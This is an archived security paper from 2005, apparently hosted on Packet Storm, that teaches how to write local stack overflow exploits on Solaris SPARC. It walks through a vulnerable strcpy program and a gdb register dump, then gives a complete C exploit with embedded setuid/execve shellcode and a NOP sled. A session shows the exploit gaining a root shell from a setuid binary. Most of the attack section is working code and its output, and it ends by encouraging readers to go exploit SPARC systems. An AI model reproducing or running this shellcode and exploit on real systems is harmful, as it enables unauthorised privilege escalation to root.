what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sparc_stack-overflow.txt

sparc_stack-overflow.txt
Posted Aug 11, 2007
Authored by skew

Writing local stack overflows on Solaris SPARC.

tags | paper, overflow, local
systems | solaris
SHA-256 | 1178fffed1c888d3076dac7a5c02c32cb12d80ea6e89eb2c63ef61178491c43f

sparc_stack-overflow.txt

Change Mirror Download
#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

Solaris SPARC: Writing Local Stack Overflows
skew 04.28.05

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

Table of Contents
=================

1. Introduction
2. Getting Started
2.1 The Vulnerable Program
2.2 Writing an Exploit
2.3 Testing 1-2-3
3. Links/References
4. Conclusion

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

1. The SPARC architecture is somewhat different than the x86 architecture that is so common around the workplace and at home. SPARC
is actually based on the RISC architecture but by Sun Microsystems. Its used mainly as running servers or sometimes as workstations,
and has gotten a fairly large number of fans that are dedicated and enjoy the workings of the system. Solaris, also by Sun
Microsystems, is a operating system that was designed to run on SPARC, and now even x86. Writing exploits for local stack overflows
on the x86 CPU may be fairly easy, but on the SPARC, it is as I said before different. Not necessarily *harder*, just a bit
different. In this text I plan on giving a example of some insecure code, showing you how to write an exploit for it, and test it
out. I do not attempt to explain the many virtues of understanding of the SPARC architecture, but I do recommend you check out the
links/references section for some good guidance on learning more.

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

2. Getting started, you'll need a SPARC box with Solaris 8, 9, or 10 installed. Along with that, you'll also need GCC, GDB, a good
text editor (vi, pico, nano, emacs, joe), and access to a shell on the box.

Open up a shell prompt and get ready for section 2.1.

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

2.1 To show you how to write an exploit, you'll need something to practice with. I'll show you the example vulnerable program we will
be exploiting in this text.

-bash-3.00$ cat vuln.c
void copy(char *a)
{

char buffer[512];
strcpy(buffer, a);

}

main(int argc, char *argv[])
{

copy(argv[1]);

}
-bash-3.00$

As you can see, a vulnerable strcpy() call is called and data can be overflowed. Also note we are working on a default security
Solaris 9 box, which does NOT have the non-executable stack feature on.

Now, lets see what we can do with this program.

-bash-3.00$ gcc -o vuln vuln.c
-bash-3.00$ ./vuln test
-bash-3.00$

Hmm.. seems to work fine so far. But, lets see if we can make it copy even more data, *possibly* making it overflow the string that
the data is being copied into.

-bash-3.00$ ./vuln `perl -e 'print "A" x 592'`
Bus Error (core dumped)
-bash-3.00$

Oh.. wow.. what happened?

-bash-3.00$ gdb -c core
GNU gdb 6.0
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.9".
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus error.
#0 0x000106d8 in ?? ()
(gdb) i r
g0 0x0 0
g1 0xef6f40f0 -277921552
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xeffffc73 -268436365
o1 0x4 4
o2 0x359c0 219584
o3 0xef7c3814 -277071852
o4 0xeffffff5 -268435467
o5 0xef7daff8 -276975624
sp 0xeffffad8 4026530520
o7 0x106c8 67272
l0 0x41414141 1094795585
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0xeffffc73 -268436365
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585 --> =]
y 0x0 0
psr 0x4400085 71303301 icc:-Z--, pil:0, s:1, ps:0, et:0, cwp:5
wim 0x0 0
tbr 0x0 0
pc 0x106d8 67288
npc 0x106dc 67292
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb)

If you didn't know, the register on the SPARC architecture that means "return address" is %i7.

i7 0x41414141 1094795585

Now, as you can also see, 0x41414141 is the current return address for the program. 0x41 = A, and we put in 592 A's.. so we must have
overflowed the buffer enough to overwrite the return address.

Although it is good that we overwrote the return address, writing 0x41414141 in it doesn't do us much good, especially if we want a
nice shell. So, to get a shell, we are going to have to overwrite the return address with the address that points to shellcode, not
data such as "A" or etc.

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

2.2 Ok, its time to write an exploit.

-bash-3.00$ cat ex.c
#include <stdio.h>

#define BIN "/export/home/skew/vuln"
#define SIZE 592 // buffer size + 80 = %i7 (retaddr) overwritten ;]

static char sc[] = /* Solaris SPARC double setuid() + execve() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

static char nop[] = "\xac\x15\xa1\x6e"; /* SPARC NOP */

unsigned long get_sp(void)
{

__asm__("or %sp,%sp,%i0"); /* or *stack pointer*,*stack pointer*,*in* */

}

main()
{

char buffer[SIZE], *ptr;
int align, i;
unsigned long retaddr, sp;

retaddr = sp = get_sp();

if((align = retaddr % 4))
{

retaddr &= ~(align);

}

memset(buffer, 0, SIZE);

for(i = 0; i < SIZE; i += 4)
{

strcpy(&buffer[i], nop);

}

memcpy((buffer + SIZE - strlen(sc) - 8), sc, strlen(sc));

ptr = &buffer[SIZE-8];

/* set fp (frame pointer / %fp) to a save stack value */
*(ptr++) = (sp >> 24) & 0xff;
*(ptr++) = (sp >> 16) & 0xff;
*(ptr++) = (sp >> 8) & 0xff;
*(ptr++) = (sp) & 0xff;

/* overwrite saved PC */
*(ptr++) = (retaddr >> 24) & 0xff;
*(ptr++) = (retaddr >> 16) & 0xff;
*(ptr++) = (retaddr >> 8) & 0xff;
*(ptr++) = (retaddr) & 0xff;

buffer[SIZE - 1] = 0;

printf("\nUsing retaddr: 0x%x\n\n", retaddr);

execl(BIN, BIN, buffer, NULL);

return 0;

}

-bash-3.00$

This exploit was written on Solaris 9 running on my Sun SPARCstation 5 with NO non-executable stack protection enabled. If your
Solaris box has the non-executable enabled, then this exploit WILL NOT work.

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

2.3 Lets test the exploit now.

-bash-3.00$ ls -al vuln
-rwxr-xr-x 1 skew staff 6576 Apr 28 08:14 vuln
-bash-3.00$ ./ex

Using retaddr: 0xeffffa58

$ id
uid=1001(skew) gid=10(staff)
$ exit
-bash-3.00$ su
Password:
# chown root:other vuln
# chmod +s vuln
# exit
exit
-bash-3.00$ ls -al vuln
-rwsr-sr-x 1 root other 6576 Apr 28 08:14 vuln
-bash-3.00$ ./ex

Using retaddr: 0xeffffa58

# id
uid=0(root) gid=10(staff) egid=1(other)
# exit
-bash-3.00$

Well, that worked out well, didn't it? Heh.

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

3. Here are some links and references that may help you.

SPARC Overflows: http://www.emsi.it.pl/sploits/solaris/sparcoverflow.html

SPARC Assembly: http://www.cs.clemson.edu/~mark/sparc_assembly.html

Sun Solaris: http://www.sun.com/software/solaris

#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$

4. The conclusion on this text is that although exploiting the SPARC architecture is different than x86, that doesn't mean it is
hard to do. As you seen in the text, its not as hard as some people like to put it. SPARC is quite exploitable, so take some time
and knock yourself out ;).

-skew (skewtty@charter.net / http://skewtty.dyndns.org) 04.28.05
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close